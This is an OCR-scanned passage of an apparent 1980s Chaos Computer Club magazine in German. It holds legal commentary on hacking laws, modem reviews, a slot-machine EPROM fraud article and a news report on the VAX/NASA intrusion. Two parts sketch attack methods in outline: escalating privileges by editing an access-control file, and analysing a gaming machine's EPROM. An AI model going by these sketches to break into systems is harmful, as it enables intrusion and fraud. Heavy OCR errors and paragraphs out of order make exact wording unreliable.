an eine Pinnwand vor der Congress-Redaktion aus¬
gehängt. Damit hat jeder Congress-Teilnehmer die
Möglichkeit, sich einen Überblick zum gesamten
Nachrichtenaufkommen zu verschaffen,
Amateurfunkfernsehen
Vorgesehen ist eine Direktübertragung laufender
Veranstaltungen. Sofern keine Veranstaltungen lau¬
fen, ist daran gedacht, vorproduzierte Videobänder
cinzuspiclen. Zudem sind kurze Nachrichienblocks
geplant, die von einem Sprecher verlesen werden.
Die Nachrichten liefert die Congress-Redaktion.
Daür der Nachrichtenblöcke max. fünf Minuten, In
den Sendepausen wird die Congress-Mailbox auf
den Sender geschaltet.
Die Congress-Redaktion (Pressestelle) hat einen ei¬
genen Telefonanschluß. Unter der Rufnummer
040/570 56 96 werden Presseanfragen beant¬
wortet. Zudem übernimmt die Redaktion in diesem
Jahr die Organisation für Interviews.
Das Metdungsangebot im Einzelnen:
Wir beginnen am 26. Dezember mit einer Aufiakt-
meldung (60 Zeilen) und einigen vorbereiteten, zeit¬
losen Features bzw. Hintergrundberichlen. Vorge¬
sehen ist ein Hintergrund zum Amateurfunkfemse¬
hen, sowie Einführungsbeiträge zu wichtigen Yer-
S>aleiifif/Itu>cr
Seite 12
ansialtungsihemen. Diese Meldungen werden in die
Congress-Mailbox eingespielt und haben in der Be¬
treffzeile die Kennung CCC87:
In diesem Jahr werden alle Referenten gebeten, von
ihrem Vorbereitungsmaterial eine Kurzfassung zu
schreiben, bzw. ihre Texte der Congress-Redaktion
zur Verfügung zu stellen. Während der laufenden
Veranstaltungen werden diese Inhaltsangaben in die
Congress-Mailbox eingespielt.
+ ACHTUNG: Presserechtlich gilt das gespro-
.chene Wort -i-
Sofern wir personell dazu in der Lage sind, werden
Mitglieder der Congress-Redaktion gezielt an den
Veranstaltungen teilnehmen und das Wesentliche
protokollieren. Diese Informationen werden als Zu¬
sammenfassung des Diskussion.sverlaufs ebenfalls
in die Congress- Mailbox eingespielt. Im Rückkanal
werden wir Anfragen, Beiträge und inhaltliche An¬
merkungen, die uns über die Congress-Mailbox zu¬
geschickt wurden, stellvertretend in die laufenden
Veranstaltungen einbringen.
Zwischendurch wird die Box mit bunten Meldungen
vom Rande des Congresses beliefert. Wichtige Er¬
eignisse werdn als Kurzmeldungen verbraten. Je
nach Bedarf, werden wir kurze Hintergrund-
Infoimationen aus dem umfangreichen CCC-Archiv
einspielen.
Personelle Besetzung
Für die Congress-Redaktion werden noch vier Fä¬
hige Mitarbeiter gesucht. Voraussetzungen zur Mit¬
arbeit sind.
- Starke Nerven und die Fähigkeit, auch im Unter¬
gang den Überblick zu halten.
- Eigenständiges Arbeiten im Team mit der Fähig¬
keit, zwischen Informationsgeröll und Wesentli¬
chem unterscheiden zu können,
- Meldungen schnell schreiben zu können.
- Eine ordentliche Portion Humor und Kreativität.
- sowie die Fähigkeit, Wunder zu vollbringen.
jwl 011256 Dez 87 BEREICH KONGRESS CRED1
Merkwürdig
Eines schönen Tages klingelt unser nettes, weisses
Telefon. Ein Herr meldet sich plump vertraulich und
wollte einen ’Einführungskurs' ins Hacken haben.
Er bot Geld. Wir hatten gerade keine Zeit und baten
zur Terminvereinbarung um seine Telefonnummer.
Er ziehe gerade um und würde sich wieder melden,
sagte der Unbekannte. Wir haben nie wieder etwas
von ihm gehört.
padeluun
CLINCH/CHAOS/PADELUUN/25.11.87123:15/404 Z.
Stoepsel veröffentlichte in der letzten DATEN-
SCHLEUDEK zwei Artikel zu Hackern und Ge¬
setzen (“Die neuen Tarife fürs Hacken“). Hier
nun eine Gegenmeinung in Kurzform.
Zu §202a: Es ist entscheidend, was man unter "ver¬
schaffen von Daten“ versteht. Christoph Biihler de¬
finiert es wie folgend: “Gmndsätzlich versteht man
hierunter die Übernahme der tatsächlichen Verfü¬
gungsgewalt und des winschaftlichen Wertes zu
eigenen Zwecken (bzw. bei Var. 2 die Übernahme
für einen Dritten und des wirtschaftlichen Wertes zu
eigenen Zwecken des Dritten.“ weiter führt er aus:
“Daher sind beispielsweise auch die sog. “Hacker“,
die sich mit einem bloßem Kenntnisverschaffen be¬
gnügen, straffrei nach §202a Stgb.“ (Zitiert nach:
Christoph Buhler, “Ein Versuch, Computerkrimi¬
nellen das Handwerk zu legen“. Das Zweite Gesetz
zur Bekämpfung der Wirtschaftskriminalität, MDR
6/1987)
Zu §303b: “Gestört“ ist das entscheidende Won.
Wann ist eine DV-Anlage gestört? Die NASA-
Rechner sind wegen der Trojanischen Pferde nicht
gestört, nicht einmal in ihrer Funktion beeinträch¬
tigt, eher um Funktionen erweitert.
asterix
Seite 13
S>nlcn3>I|Icubcc
Begriffsvernebelung
Zum Thema Raubkopieren
In der letzten DATENSCIILEUDER fand sich
ein Artikel zum Thema “Raubkopieren“. Als
Verfasser zeichneten Caesar/Stöpsel. Was das
“/Stöpsel“ angeht, hat mich die Redaktion durch
ein Versehen mit Federn geschmückt, die mir
mangels Urheberschaft nicht zustehen. Ich muß
mich aber, vor allem in Bezug auf die Gesamt¬
tendenz, von dem Artikel distanzieren, möchte
das aber jetzt nicht im einzelnen erörtern. Da¬
gegen will ich die Aufmerksamkeit lieber auf
einen bisher völlig vernachlässigten Aspekt der
Raubkopierer-Diskussion lenken: Den Begriff
“Raubkopie“ bzw. “Raubkopierer“. Denn; ES
GIBT WEDER “RAUB“-KOPIEN, NOCH
“RAUB“-KOPIERER!
Ist das Koieren also frei und erlaubt? Nein, obwohl
bei weitem nicht für jedes Programm, bei dem das
behauptet wird, ein Urheberrechtsschutz besteht.
Wogegen ich mich entschieden wende, ist allein der
Begriff “Raubkopie“. Er rückt ein einfaches Ver¬
gehen in die Ecke des Verbrechens und der Ge-
waltkriminalität. Denn unter Raub versteht der Jurist
die Wegnahme einer fremden beweglichen Sache
unter Anwendung von (körperlicher) Gewalt oder
von qualifizierten Nötigungsmitteln, d.h unter Dro¬
hung mit gegenwärtiger Gefahr für Leib oder Leben.
Dies trifft aber - wie jeder weiß - auf die sog.
“Raubkopien“ in keiner Weise zu. Gemeint ist doch
das illegale Ziehen von Kopien urheberrechtlich
geschützter Progamme. Ein Programm ist aber
schonkeine“Sache“, sondern einegeistigcLeistung.
Sache ist nur der (dem Kopierenden gehörende)
Datenträger, auf dem das Programm gespeichert ist.
Das mag man vielleicht noch als übertriebenen ju¬
ristischen Feinsinn abtun. Dies ändert jedoch nichts
daran, daß die illegal gezogenen Kopien nicht mit¬
tels Gewalt oder unter Einsatz von qualifizierten
Nötigungsmitteln beschafft werden. Von Raub kann
daher keine Rede sein.
Selbst wenn ausnahmsweise einmal eine Pro¬
grammkopie geraubt würde, sollte man von einer
geraubten Kopie und nicht von einer “Raubkopie“
sprechen. Man sagt ja auch “gestohlenes Auto“ und
nicht “Stehlauto“.
SntcnSd^Icubcc
Was heisst hier
"Falsche Eingabe " ?
Hier wird durch den gezielten Einsatz von fälschen
Begriffen versucht, ein vom Gesetz mißbilligtes
Verhalten noch we it darüber hinau s zu geißeln und
die Täter zu diskriminieren. Selbst die bei der Wahr¬
nehmung ihrer Interessen oft wenig zimperlichen
Einzelhändler haben es nicht versucht - und schon
gar nicht geschafft - die Ladendiebe als Ladeniäuber
zu verunglimpfen.
Unverständlicherweise muckt niemand auf gegen
diesen Verbalterrorismus der Software-Hersteller.
Selbst im juristischen Schrifttum und in der Recht¬
sprechung wird der Begriff “Raubkopie“ völlig kri¬
tiklos übernommen. Darum gilt mein Resp,ekt (und
meine Verachtung) der PR-Arbeit der Söfrware-
häuser. Gute Arbeit. Wenn die Programme auch nur
annähernd so perfekt wie die PR wären, dann würde
es bestimmt auch weniger “Raub“-Kopien geben...
Stoepsel
CLINCH/DS-RED/STOEPSEL/26.11.87/14:51/3398Z.
Seite 14
Stiftung Modemtest
hat mal wieder zugeschlagen
Modem: Lynker’s 1200
Vertrieb; Fa. C-LOG, München
Vorteile: kleinere Abmessungen; zwei Telephon¬
kabel und ein RS232-Kabel dabei.
Nachteile: Kleines Menual (zwar sind alle Befehle
mal erwähnt, aber die Bedeutung einiger Bits der
Statusregister schon nicht mehr). Das Ermitteln der
Baudrate bei Autoanswer geschieht wie beim Well-
con mit einem 600 Baud-Cairier, manche Gegen-
siationcn conneclen da nicht. Komischerweise
konnte manchmal keine Box bei 300 Baud erreicht
werden; ein Umstellen auf BELL-Norm half manch¬
mal. Das Modem ist etwas zu emfindlich und etwas
zu leise (input -.SOdBrn; outppt -lOdBm).
Wenung; Gibt besseres.
Modem: Lynker’s 2400
Vertrieb: Fa. C-Log, München
Vorteile: kann 300 Baud CCITT (das ist bei einem
2400-Baud-Modem eine Seltenheit). Kann 1200/75
(und 75/1200) Baud. Zwei Telephonkabel und ein
RS232-KabeI dabei.
Nachteile: bei 1200/75 ist keine Wandlung drin, d.h.,
ihre Schnittstelle muß mit zwei unterschiedlichen
Baudralen gefahren werden; das können leider die
wenigsten (glücklich ist, wer da einen ST hat). Die
Baudiatenerkennung bei Autoanswer funktioniert
nicht richtig (laut Hersteller wird daran gearbeitet).
Zu kleines Manual (s.o.). Keine Dipswitches am
Modem, um eine Grundeinstellung beim Einschal¬
ten zu haben. Das modern ist etwas zu emfindlich
und etwas zu leise (input -49dBm; output -lOdBm).
Wertung: Bedingt einsatzfähig.
Seite 15
Modem; Lightspeed 2400c
Vertrieb: Fa. MPI, Aachen
Vorteile: kann 300 Baud CCnT (das ist bei einem
2400-Baud-Modem eine Seltenheit). Kann 1200/75
(und 75/1200) Baud. Baudratenwandlung bei
1200/75. Gutes Manual. Helpscreen eingebaut.
Speicher für die Konfiguratuion des Modems. Zwei
Telephonnummem-Speicher.
Nachteile: die Baudratenerkennung bei Autoanswer
klappt ganz gut, nur mit einem Modem hatten wir
Probleme (Besitzer eines Zellcon-Modems sollten
ihr auf BELL Norm stellen, bevor sie eine Box mit
diesem Modem anrufen). Die Erkennung der Be¬
setztzeichens funktioniert nicht (das 1200er bringt
das). Im Manual ist nirgends erwähnt, wie man auf
1200/75 stellt (“ATB2“ wußte der Vertrieb anfangs
auch nicht aber jetzt scheint ein Beipackzettel dabei
zu seien). Für 1200/75 mit BTX muß man das Mo¬
dem auf “ATXO“ stellen, sonst kriegt man keine
Verbindung. Das Modem ist etwas zu leise (output
-lOdBm).
Wertung: gut (die Nachteile lassen sich mit Now-
How aufheben).
Bemerkung: Angeblich sind noch alte Modems des
Typs Lightspeed 2400 - also ohne das “c“ - im
Umlauf. Hände weg davon!
Noch ein bißchen was über die Emfindlichkeiten
und den Outputlevei der Modems, Er wird in dB m
(dezibel) gemessen und ist ein Maß für die Dämp¬
fung einer Thlefonleitung (Postler mögen mir bitten
meinen Dilettantismus verzeihen). Der negative
Wert z.B. bei der Angabe des Outlevel ist ein Maß
für die Ueberwindung der Dämpfung - je mehr ne¬
gativ, desto lauter (=emfindlicher) das Modem.
Postmodems haben Werte von Output =-15dBm /
Input = -40dBm, sind also lauter, und unemfindli-
cher gegenüber Störungen als die Hayesmodems.
WirbittendieHersteller,das zu berücksichtigen und
die Modems zumindest umschaltbar zu machen.
Ein Fehler, der bisher bei allen Hayes-Modems
(außer LS 2400c) aufgetrefen ist: Wenn man Auto¬
answer hardwaremäßig (oder wie auch immer) ein¬
gestellt hat und der DTR auf NULL zieht, kann es
sein, daß bei einem Anruf in dieser Zeit das Modem
ganz kurz abhebt und sofort wieder auflegt. Was soll
der Mist? Der einzige, der davon profitiert, ist die
POST. Haß... Also liebe Hersteller es gibt noch was
zu tun.
Hackowltz
CLINCH/SYSOP/GAST/08.11.87/21:23/3574 Z.
SuKcnSrf,Imker
Goldesel streck Dici.
Computerbetfug am Automaten {
Wege zu Wohlstand und Reichtum schienen sich
zu eröffnen, als Zeitungen die ersten Berichte
über “Computerfreaks“ brachten, die dem Ge¬
heimnis des Glücks am Spielautomaten auf die
Spur gekommen waren. Gerüchteweise war dies
folgendermaßen zu bewerkstelligen: Man brau¬
che mit dem Programm in der Hosentasche nur
zum richtigen Zeitpunkt dem Gerät den Befehl
“Goldesel streck Dich“ geben, und schon könne
man mit einer Flastiktüte den Gcldsegen auf¬
fangen. Und das alles legal. So oder so ähnlich
jedenfalls las sich das in einem Teil der Presse, die
freudig das neue Thema aus dem Bereich “da¬
tenwütige Jugend“ aufgriff.
Zumindest seit dem Inkrafttreten des 2. WiKG
(Zweites Gesetz zur Bekämpfung der Wirtschafts-
kriminalität vom 1:8.1986) kann man diesem Weg
jedenfalls niemandem mehr als legalen Weg zur
Vermögensbildung empfehlen. Mehr als 500 Ver¬
fahren sind zur Zeit - nach Informationen der Zeit¬
schrift “Computer und Recht“ (CR) Nr.8/1987 - in
der Bundesrepublik in solchen Sachen anhängig.
Wie stellt man es nun eigentlich an, dem Glück in die
Karten zu schauen?
I s Icchgehäuse beseitigt werden muß. Darüberhinaus
lülU aber vor allem der Wortlaut des neuen § 202 a
ötGB. der das Ausspähen von besonders gesicherten
Daten unter Svafe (Freiheitsstrafe bis zu drei Jahren
oder Geldstrafe) stellt, keinen Zweifel daran, daß es
auch nach dieser Vorschrift sich um eine Straftat
handelt.
Was ist aber mit denjenigen, die z.B. eine solche
Programmanalyse von einem Freund als absolut
heißen Tip geschenkt bekommen haben? Müssen
auch sic mit einem Ende hinter Gittern rechnen,
wenn sie bei dem Versuch, ihr Taschengeld aufzu-
bessem, ertappt wurden? Die traditionellen Vor¬
schriften des Strafgesetzbuches geben im Prinzip
nicht genug her, um einen solchen Tatbestand zu
erfassen. Diese Lücke wird jedoch durch die neuen
Vorschriften geschlossen.
Da gibt es z.B. die Vorschrift des Computerbetrugs,
§268 aStGB. Abs, 1 lautet: “WerinderAbsicht, sich
oder einem Dritten einen rechtswidrigen Vermö-
gensvoneil zu verschaffen, das Vermögen eines an¬
deren dadurch beschädigt, daß er das Ergebnis eines
Datenverarbeitungsvorgangs durch unrichtige Ge¬
staltung des Programms, durch Verwendung un¬
richtiger oder unvollständiger Daten, durch unbe¬
fugte Verwendung von Daten oder sonst durch un¬
befugte Einwirkung auf den Ablauf beeinflußt, wird
mit Freiheitsstrafe bis zu fünf Jahren oder Geldstrafe
bestraft.“
Alle moderneren Geldspielautomaten sind mit
einem Zentralrechner (CPU) ausgestattet, der mit
einem EPROM-Chip bestückt ist. Da don das Pro¬
gramm des Spielablaufs verborgen ist, ist dieses
wertvolle Stück auch in der Regel durch ein Blech¬
gehäuse gegen Zugriffe oder Beschädigungen ge¬
schützt. Den EPROM-Chip muß man nun zunächst
in seine Gewalt bringen, um dann das Spielepro¬
gramm auf einem Computer einer Analyse zu un¬
terziehen. Mit Hilfe dieser Analyse ist der Pro¬
grammablauf vorhersehbar. Die Tasten des Auto¬
maten lassen sich gezielt und für den jeweiligen
Spieler nutzbringend betätigen.
Der Gesetzgeber hat nun - vor allem in das Straf¬
gesetzbuch - so manche Vorschrift eingebaut, die
unteranderemauch den experimentierfreudigen jun¬
gen Leuten Grenzen in der scheinbar grenzenlosen
Welt der Daten setzt: Daß die zuvor beschriebene
Vorgehensweise nicht legal ist, liegt auf der Hand.
Ohne Sachbeschädigung dürfte man kaum in den
Besitz des EPROM-Chips kommen, da ja der
Automat abgeschlossen ist und auch das schützende
Input-Manipulation
Diese Vorschrift, die insbesondere auch im Hinblick
auf die sogenannten Bankautomaten-Fälle ge¬
schaffen wurde, scheint auf den ersten Blick exakt
auf unseren Fall zu passen, da die Vorschrift die
unbefugte Verwendung von Daten ausdrücklich be¬
nennt. Allerdings ist mit dem Begriff der “unbe¬
fugten Verwendung von Daten“ die sogenannte
Input-Manipulation gemeint, d.h., unbefugt erhal¬
tene Daten werden eingegeben. Davon kann nun
nicht die Rede sein, wenn man sich lediglich in
Kenntniss des Programmablaufs im richtigen Mo¬
ment die richtige Taste drückt.
Dies ist nun der Punkt, an dem sich die Juristen zu
streiten beginnen. So wird zu diesem Problem die
nicht von der Hand zu weisende Meinung vertreten
(Marion Westpfahl, CR 87, a.a.o.), daß der Gesetz¬
geber nicht nur die Eingabe von Daten unter Strafe
stellen wollte. Eine unbefugte Verwendung soll auch
dann vorliegen, wenn die Daten nicht unmittelbar
eingegeben werden, sondern wenn nur in deren
Kenntnis auf den Daienverarbeitungsvorgang ein¬
gewirkt wird.
Mag sein, daß der Gesetzgeber daran gedacht hat. Ich
meine Jedoch, daß hier bei der Auslegung einer
möglicherweise nicht besonders präzise formulier¬
ten Vorschrift ein Schritt zu weit gemacht wird.
Darüberhinaus kann diese weitgehende Auslegung,
die eine Strafbarkeit nicht mehr an die unmittelbare
Eingabe von Daten knüpft, in der Praxis erhebliche
Beweisschwierigkeilen mit sich bringen. Man stelle
sich nur einmal folgende Situation vor: Gustav G.
wird von der Polizei in dem Moment am Automaten
gestellt, als er einen größeren Gewinn macht. Eine
Programmanalyse trägt er bei sieh. Leider verstand
er die Analyse nicht anzuwenden und vertraute daher
mit Erfolg allein seinem sprichwörtlichem Glück.
Niemand wird dem Unglücklichen glauben, er habe
sich die Kenntnisse des Programms nicht zunutze
gemacht. “Das kann ja jeder sagen“,
ln Erwartung solcher und anderer Schwierigkeiten
mit dem neuen Gesetz wurde aber ergänzend ein
Auffangtatbestand geschaffen, indem auch die “son¬
stige unbefugte Einwirkung“ Ablauf unter Strafe
gestellt wurde. Nach der Maxime des Bundesver¬
fassungsgerichts. welches dem Gesetzgeber ans
Herr gelegt hat, “der Vielgestaltigkeit des Lebens
Herr zu werden“, sollte mit dieser Formulierung ein
Tatbestand geschaffen werden, der neue und zurZeit
noch nicht bekannte bzw. nicht vorstellbare Formen
der Computermanipulationen erfaßt. Dieser doch
extrem breit gefaßte Tatbestand hat zu Recht Kritik
erfahren, da er die unter Soafe gestellteTathandlung
nicht genau genug bestimmt.
Was bei aller (und wohl auch berechtigter) Kritik
unter dem Strich übrig bleibt; diese Vorschriften
sind Realität, Es besteht kein Zweifel, daß die Ge¬
richte von ihnen Gebrauch machen werden. Es wird
dann ihr Problem sein, sich z.B. mit den oben be¬
schriebenen Beweisschwierigkeiten herumzuschla¬
gen. In jedem Fall muß der “Glückspieler“, auch
wenn er nur die Tasten drückt, damit rechnen, zu¬
mindest wegen “sonstiger unbefugter Einwirkung“
auf den Verlauf des Glücks venineilt zu werden.
Thilo
SnlcnSritilciiher
Umsonst in Bildschirmtext
Als Bildschirmtext-User fragt man sicht oft, was
der Blüdeltexl-Scheiß eigentlich soll. Informa¬
tionen enden meist in Werbung (Suche Infos über
Sri Lanka, und du landest bei Avis Autovermie¬
tung) und das schwachsinnige Suchverfahren
(Baumhangc!) kommt auch nicht besonders gut.
Da gibtsaberdoch ’nen paar (wenn auch wenige)
Dinge umsonst oder zu Low-Cost, die man ein-
sacken sollte.
1) Bundespostkrams: Druckwerkerzeugnisse. Das,
wo jeder was mit anfangen könnte, ist kostenpf¬
lichtig, klaro. Aber das, was schon bei der Herstel¬
lung Kohle kostet, gibt's umsonst. Gemeint sind
Mikrofiches. Diese netten postkartengroßen Dias
mit 430 Din-A4-Seitcn drauf gibts bei der Post zum
Nulltarif. Einzelexemplar kostenlos, heißt es. Be¬
stellung von Einzelexemplaren im Wochentumus
macht richtig Bock. Merkt euch mal folgende Be¬
stellnummern:
652607469-4 Straßenverzeichnis der Post
652607296-1 und 396-8 Postleitzahlverzeichnis
652607096-9 Ortsverzeichnis
652661596-5 Gebührentafeln
652167596-0 Druckvwerkeverzeichnis
2) Bundesverband Politische Bildung *51511,,. Da
gibts allerlei hübsche Büchlein, so ca. 50 Stück, von
der Weimarer Zeit über Adolf und Pressefreiheit...
CLINCH/DATENREISEN/HHNET/18.09.87/00:41/1292
Seite 16
Seite 17
Sicherheitsrisiken von
Computersystemen
Hacker schleichen sich
Hamburg (clinch) - In der Wissenschaft ist es
längst üblich, Informationen elektronisch unter
Angabe der richtigen Passwörter von Computer
zu Computer zu verschicken. Besonders die
Kernphysiker in Forschungszentren mit ihrem
extrem hohen Datenaufkommen sind auf Com¬
puterkommunikation angewiesen.
Zudem lassen sich Daten und Programme an der
einen Stelle aufbewahren und von außerhalb abru-
fen. Nur so ist die Zusammenarbeit über Grenzen
hinweg möglich. Doch das dafür geschaffene Netz
ist hackerfreundlich: Es wurde mit dem Ziel ge¬
gründet, wissenschaftlichen Einrichtungen den Zu¬
gang zu den Weltraumbehörden NASA (USA) und
ESA (Europa) zu verschaffen. Das Rückgrat bilde¬
ten die DEC-Systeme pigital Equipment) der NA¬
SA. Dabei wurde ein Computertyp eingesetzt, der
unter Hackern besonders beliebt ist, weil er sich auf
Billigcomputem besonders gut nachmachen läßt.
Und prompt ist es passiert
Im August dieses Jahres warnte Greg Chartrand,
Computermanager des amerikanischen Kemfor-
schungszencrums Fermilab in Batavia nahe Chicago
seine Kollegen in aller Welt: .Jlacker haben im Juli
ihre Spuren in Europa hinterlassen und breiten sich
nun in den ÜSA aus“. Und es waren deutsche Hac¬
ker, die mit-„Trojanischen Pferden“ Rechenzentrum
um Rechenzentrum eroberten, besonders in der eu¬
ropäischen und amerikanischen Raumfahrtfor¬
schung. Betroffen sind Computer des Typs VAX der
Fa. Digital Equipment (DEC). Die Hacker konnten
jedes Programm und jede Datei eines angegriffenen
Systems öffnen. Keine Sicherheitsschranke hielt sie
auf. Der jüngste „Superhack“, der zunächst nur
stückweise bekannt wurde, gilt als der erfolgreichste
seit der Existenz von Computern und übertrifft alle
Befürchtungen der Experten. Zwar handelt es sich
bloß, wie sich herausstellte, um den elektronischen
AbfalUcorb der NASA, in den man vorgedrungen
war, aber immerhin.
Der Einsteig in das Netz der DEC-Anlagen war nach
dpa verblüffend einfach. „Beim Spielen mit den
Computern ohne böse Absicht waren die Hacker in
in Datensysteme ein
ein Software-Loch gefallen“, erklärte ein Sprecher
des Hamburger Chaos Computer Clubs. Die Hacker
meldeten sich mit dem bereits bekannten Passwort
als Besucher beim Computer an und riefen die Liste
mit den verschlüsselten Informationen über die Zu¬
griffskontrolle auf. Das Ergebnis war - wie erwartet
- eine Fehlermeldung. Diese wurde jedoch einfach
ignoriert und die bereits offene Datei geändert. Die
Hacker trugen sich ebenfalls in die Liste ein und
gaben sich damit die Zugriffsrechte des System¬
managers.
Wie inzwischen bekannt wurde...
...sind auch Teile des Computersystems der Deut¬
schen Forschungs-und Versuchanstalt für Luft- und
Raumfahrt (DFVLR) in Oberpfaffenhofen bei Mün¬
chen betroffen. Es handelt sich dabei um Systeme
des Typs VAX 4.4,4.5, wie der Pressesprecher in der
Kölner Zentrale auf Anfrage einräumte. 135 Ein¬
heiten dieser Art seien insgesamt in neun Landern
von Hackern „geknackt worden“. Andere Pro¬
gramme wurden manipuliert, um sich „unsichibai“
zu machen. Auf dem Bildschirm und in den Aus¬
drucken erschien kein Hinweis auf die Eindrin¬
glinge. Wie einst die alten Griechen im Inneren eines
hölzernen Pferdes in die belagerte Stadt Troja ge¬
langt waren, so hatten sich jetzt die Hacker in frem¬
den Computern eingenistet.
(aus: Poliieispiegel I1I87, S.245)
CUNCH/CHAOSIREDAKTIOmö.OI.88/11:49ß370Z.
Grundlagen für den Einsatz neuer
Technologien in den Geisteswis¬
senschaften
Prof. Dr. Ekkehard Mariens und Peier Maiussek. önivcrsiiäi
Hamburg, Arbeiisgnippe „Seuc Technologien, Philosophie
und mtdung "
Kurzdarstellung des Projekts einer
„Hermeneutischen Interessen angepaßten Technologie“
(HIAT)
Das Projekt HIAT stellt sich die Aufgabe, ein
bisher ungenutztes Wirkungspotential neuer
Technologien für die geisleswlssenschartliche
Forschung zu erschließen.
Deren immernoch äußetst geringe Akzeptanz gegen
den Einsatz compuiergestützter Hilfsmittel ist auf
ein Akzeptabilitätsproblem zurückzufUhren: Die
verfügbaren Technologien werden den geisteswis¬
senschaftlichen Forschungsinteressen grundsätzlich
nicht gerecht. Sic sind auf die empirisch-erklärenden
Verfahren der Naturwissenschaften zugeschnitten.
Der hermeneutisch-verstehende Ansatz der Ge-
istcswisscnschaflen aber setzt einer Formalisierung
sowohl ihrer Inhalte als auch ihrer Arbeitsmethoden
prinzipielle Grenzen.
Der geisteswissenschaftliche
Arbeitsplatz von morgen
Die Anerkennung dieses paradigmaiischen Gegen¬
satzes muß und darf jedoch nicht in resignative
Technikabstinenz münden. Vielmehr enthält er eine
produküve Spannung, aus der technologische Lö¬
sungen für die geisteswissenschaftliche Forschung
zu gewinnen sind.
Unter dieser Prämisse konzipiert das hier vorge¬
stellte Projekt die Gestaltung des geisteswissen¬
schaftlichen Arbeitsplatzes von morgen. Durch eine
praxisorientierte Gmndlagenforschung im interdis¬
ziplinären Dialog zwischen Geisteswissenschaftlern
und Informatikern will es die zukunftsorientienen
Anforderungen an neue Technologien im Sinne ge¬
isteswissenschaftlicher Problemstellungen formu¬
lieren und experimentell realisieren.
Als Pilotstudie soll eine Software mit Expertensy-
stemßhigkeitcn entwickelt werden, die drei Grund¬
typen hermencutischen Arbeitens gerecht wird und
sie forschungsintensivierend vereinigt: interpreta-
tive Phändmenkonstitution, sinnorientierte Re¬
cherche und praktische Darstellung. Diesen Vor¬
gaben entspricht das zu konstruieiende „Personal
Indexing and Retrieval plus Editor“ (P.I.R.E.).
P.I.R.E.
Es bietet dem Geisteswissenschaftler einen indivi¬
duell angepaßien Zugriff auf eine Volltextdalen-
bank, der über drei kooperierende Anwenderpro¬
gramme für hermeneutisches Arbeiten zu nutzen ist:
Der „Indexer“ hilft bei der Ideenfindung und Pro¬
blemformulierung durch eine interaktive Dialog¬
führung und strukturien entsprechend den Wis¬
sensbestand der Datenbank vor. Das Retrieval-
Sysiem, der „Knowledge-Navigalor", gestattet eine
somit auf die jeweiligen Forsehungsintcrcssen zu¬
geschnittene Dalenselekiion. Der ..Editor“ ist ein
Textverarbeitung.sprogramm,das die Gestaltung und
Konzeption auch nicht hierarcliiscli gegliederter
Texte unterstützt, wobei es sich den jeweiligen
Indizierungs- und Selektionspräferenzen „intelli¬
gent“ anpaßt. Die drei Teilkomponenten arbeiten
parallel im Multitasking-Verfahren, so daß z.B. der
Schreibvorgang durch die Indizierungsdialoge un-
tersiülzl werden kann und der „Knowledge Navi¬
gator'“ jeweils adäquates Infonuationsmaterial be-
rcitstcllt.
Das Knowledge Engineering fiirdas P.I.R.E. bedarf
als Voraussetzung einer kritcriologischen Klärung
hermeneutischer Arbeitsiechniken. Sie soll durch
Wissenschafts- und medientheorctische Untersu¬
chungen zur geisteswissenschaftlichen Methodolo¬
gie erbracht werden. Ansätze für deren informa¬
tionstechnische Umsetzung bieten neuere Trends
der KI-Forschung, die das Design von Zugangssy¬
stemen nach dem (hermenemischen) Modell offener
Dialogstiukturen konzipieren.
Der Prototyp des P.I.R.E. ist schließlich in einer
größeren Feldstudie zu forschungsrelevanten Pro¬
blemstellungen daraufhin zu übeqtrüfen, ob er den
Kriterien von HIAT genügt und ggf. entsprechend zu
modifizieren.
Ziel des Gesamtprojekts ist die Erarbeitung von
Rahmenrichtlinien für die sinnvolle Verwendung
neuer Technologien in den Gcisieswissenschaftcn.
Snteii6tüß“'>e':
Seite 18 Seiteis
Siilcnttdjicubcr
Postvertriebsstück
C9927F
Wenn uazusteUbar
Aascbrifieoaiisschaitt bil
mh aet]«r Adresse zorück
CHAOS COMPUT» CLUfr UAheuKQ
Eldelstcdter OUrgerhaus
ElbgaustraN 12 2800 Hanburg 54
Sonntag, 27,Dczenbtr 1967,09.00 Uhr
Dia Europäische Hackerparty.
uuntoi
Offene Netze - Jetztl, der NASA~Couo.
Hacker und Staat(evtl.1ive), Perspektiven
Hacker-Szene, Mai Ibox-Uernetzuny,
Verschlüsselung und Verschleiervny.
Tei Ina hftegebvhrj
Mitglieder 19.-, private Tellnehner 20.-,
Presse 50.-
üorannetOune durch ubtrwflsuny au#
Konto SS >0 se - KOI Dein rofTaironnt Hantiurs
Caelcs Altbrinsenll
PaOfoto nitbringen!
Chaos Conputer Club g«U.
Schwenckestrafle 69
2Boe Hanburg 20
Ttu#en eae / 4te i7 i?
BTX aCHAOft
BTx acHAosa \ M fMw.#
Htl^r* Infomatlonen lau#and Jn Otf
CLINCH-Mellbos KaAturs 94 % »| i?
Salciigrfffcubcr
DM 3,00
Nuimuci 2? I Mu-t/. lyxs
®te ^aten^c^leitber
Das wissenschaftliche Fachblatt für Datenreisende
Ein Organ des Chaos Computer Club
Die Beschuldigte ist /MkK aufgrund der bisherigen Ermittlungen verdächtig,
anderen geholfen au haben*
•/ X A\ A .T. K 11 ■^1 '1 n '■
H 1 tu <1 L i irc i l
w 'r 31 I ir o .-r 3 a D ft V
S l ü ü M IL (L L LU l QgP, Hackern sind
Congress Critic
Hacker im Beamtenstatus?
Hallu CCC’ler. Ich bin nun schon seit zwei Tagen
auPin CCCongress. Und was füllt mir auf? Die
Sprache.
Diese Sprache, die hier fast ausschließlich verwen¬
de! wird, stößt mir sauer auf. Nur noch pseudojuri-
siische Spitzfindigkeiten und Verwaltungs-
Sprachgehabe. Selbst wenn Uschi möchte, daß ich
ihr beim Umstellen der Kaffeemaschine behilflich
bin, faselt sie irgendetwas von 'Zuständigkeitsbe¬
reich’ und von ’Projektleitung’, Nichts gegen Uschi.
Auf ihr Sprachgebaren aufmerksam gemacht, mein¬
te sie, daß sie sich halt anpasse.
Der CCC als Schulungsorganisation für Vcrwal-
tungsabläufe? Sicherlich ist es ganz angenehm,
wenn einige Sachen geklärt sind und ein Mindest¬
maß an Handshake-Protokoll gewährleistet ist. Aber
was zuviel ist ist zuviel!
Es gab wohl bereits intern eine Menge an Diskussion
über das verzweifelte Bemühen, das Chaos in den
Griff zu kriegen. Fein. Aber was hier auf dem
CCCongress am Rande der 'galaktischen Verein¬
igung ohne feste Strukturen’ als Ordnungsstruktur
niitliiufi, ist nicht neu, sondern uralt. Ich bemerke
ticfprovinzielle, tirdeutsche Rotes Kreuz- und frei¬
willige Feuerwehr-Allüren.
